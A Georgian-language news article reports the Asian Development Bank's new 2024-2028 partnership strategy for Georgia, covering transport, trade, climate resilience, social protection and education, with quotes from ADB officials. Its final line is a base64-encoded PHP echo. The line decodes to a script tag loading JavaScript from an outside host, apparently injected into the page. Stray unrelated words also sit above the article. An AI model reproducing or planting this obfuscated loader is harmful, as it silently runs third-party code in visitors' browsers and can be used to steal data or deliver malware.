celsiusi
ავერსი საქკაბელი

 აზიის განვითარების ბანკმა დღეს დაამტკიცა საქართველოსთან თანამშრომლობის ახალი სტრატეგია, რომელიც ქვეყანას მწვანე და ინკლუზიურ რეგიონულ კარიბჭედ განვითარებაში დაეხმარება. თანამშრომლობის ხუთწლიანი, 2024-2028 წლების სტრატეგია მიზნად ისახავს საქართველოს მდგრადი განვითარების ხელშეწყობას სახელმწიფო და კერძო სექტორში ინვესტირებით, რეფორმების მხარდაჭერითა და ცოდნის გაღრმავებით. სტრატეგიაში განსაკუთრებული ყურადღება ეთმობა რეგიონულ თანამშრომლობასა და ინტეგრაციას და კერძო სექტორის ხელშეწყობას ეკონომიკური ზრდისთვის, ადამიანური კაპიტალის განვითარებასა და კლიმატის ცვლილებას.

„ADB-სა და საქართველოს მტკიცე პარტნიორობა აკავშირებს და ჩვენი მიზანია ქვეყანას დავეხმაროთ მწვანე და ინტეგრირებულ ეკონომიკაზე გადასვლასა და საზოგადოების გაძლიერებაში მისი მეტი მედეგობისა და ინკლუზიურობის მიზნით. განვაგრძობთ საქართველოს დახმარებას გამოიყენოს მისი გეოგრაფიული უპირატესობა და თავისუფალი ვაჭრობის შეთანხმებები, რათა გახდეს რეგიონის კარიბჭე, რომელიც კავკასიასა და ცენტრალურ აზიას ევროპასა და დანარჩენ მსოფლიოსთან დააკავშირებს“, – განაცხადა ADB-ის ცენტრალური და დასავლეთ აზიის დეპარტამენტის დირექტორმა, ევგენი ჟუკოვმა.

სახმელეთო და საჰაერო კავშირების გამყარება, ვაჭრობის გაფართოება და ადამიანური კაპიტალის გაძლიერება აუცილებელია მდგრადი და მრავალმხრივი ეკონომიკური ზრდისა და საქართველოს იმ მისწრაფებების განსახორციელებლად, როგორიცაა ევროპასა და აზიას შორის რეგიონის კარიბჭის როლი და ევროკავშირის წევრობა. ახალი სტრატეგია პირდაპირ მხარდაჭერას უცხადებს საქართველოს სახელმწიფო განვითარების სტრატეგიის (ხედვა 2030) სამ მთავარ პრიორიტეტს – ეკონომიკური განვითარება, სოციალური პოლიტიკა და ადამიანური კაპიტალის განვითარება და საჯარო ადმინისტრირება.

„ვამაყობთ, რომ ვთანამშრომლობთ საქართველოს მთავრობასთან, როცა ქვეყანა აგრძელებს მუშაობას რეგიონულ სატრანსპორტო და სავაჭრო ჰაბად განვითარებისთვის კლიმატგამძლე ინფრასტრუქტურისა და ძლიერი სოციალური დაცვის გაძლიერების კვალდაკვალ. ADB როგორც საქართველოს ერთ-ერთი უდიდესი განვითარების პარტნიორი, განაგრძობს ინტეგრირებულ მხარდაჭერას კომპლექსური ინფრასტრუქტურის განსავითარებლად, რეფორმების მხარდაჭერისა და კერძო სექტორის გაძლიერების პარალელურად“, – განაცხადა ADB-ის მუდმივი წარმომადგენლობის დირექტორმა საქართველოში, ლესლი ბეარმან ლამმა.

ADB განაგრძობს საქართველოში მულტიმოდალური სატრანსპორტო ქსელის განვითარების მხარდაჭერას, კლიმატისა და ბუნებრივი კატასტროფების მიმართ მედეგობის გაძლიერებას, სუფთა ენერგიის წარმოებისა და ვაჭრობის გაფართოებას. ბანკი ასევე განაგრძობს რეფორმების მხარდაჭერას საქართველოში სოციალური დაცვის გასაძლიერებლად, საპენსიო სისტემისა და კაპიტალის ბაზრების განსავითარებლად და ხელს შეუწყობს განათლების სისტემის მხარდაჭერას მათ შორის პროფესიური განათლებისა და გადამზადების მიმართულებით.

ADB საქართველოს მხარდამჭერია 2007 წლიდან და ის ქვეყნის განვითარების ხელშეწყობის ერთ-ერთი ყველაზე დიდი მრავალმხრივი პარტნიორია. საქართველოსთვის გაცემული სუვერენული და არასუვერენული სესხების ჯამური ოდენობა 3.9 მილიარდ აშშ დოლარს შეადგენს.

ADB-ის მიზანია, ხელი შეუწყოს აზიისა და წყნარი ოკეანის რეგიონის წარმატებულ, მრავალმხრივ, მედეგ და მდგრად განვითარებას. ამავდროულად, ის აგრძელებს მუშაობას რეგიონში უკიდურესი სიღარიბის აღმოსაფხვრელად. 1966 წელს დაარსებული ორგანიზაცია აერთიანებს 68 ქვეყანას, მათ შორის 49 აზიის რეგიონიდანაა წარმოდგენილი.

168
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");